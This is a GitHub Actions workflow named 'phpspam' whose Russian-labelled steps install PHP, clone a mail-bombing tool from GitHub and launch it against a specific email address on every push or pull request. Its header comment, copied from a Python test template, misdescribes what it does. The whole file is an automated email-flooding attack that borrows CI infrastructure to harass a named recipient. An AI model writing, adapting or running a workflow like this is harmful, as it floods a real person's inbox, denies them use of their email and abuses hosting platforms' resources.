# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python

name: phpspam

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.10
      uses: actions/setup-python@v3
      with:
        python-version: "3.10"
    - name: Установка импортов
      run: |
        sudo apt install git -y
        git clone https://github.com/juzeon/fast-mail-bomber
        sudo apt install php libapache2-mod-php php-mysql -y
        sudo apt install php-redis php-zip -y
        if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
    - name: Запуск спама
      run: |
        cd fast-mail-bomber
        mv config.example.php config.php
        php index.php start-bombing 6i2aqcxtaj@rfcdrive.com
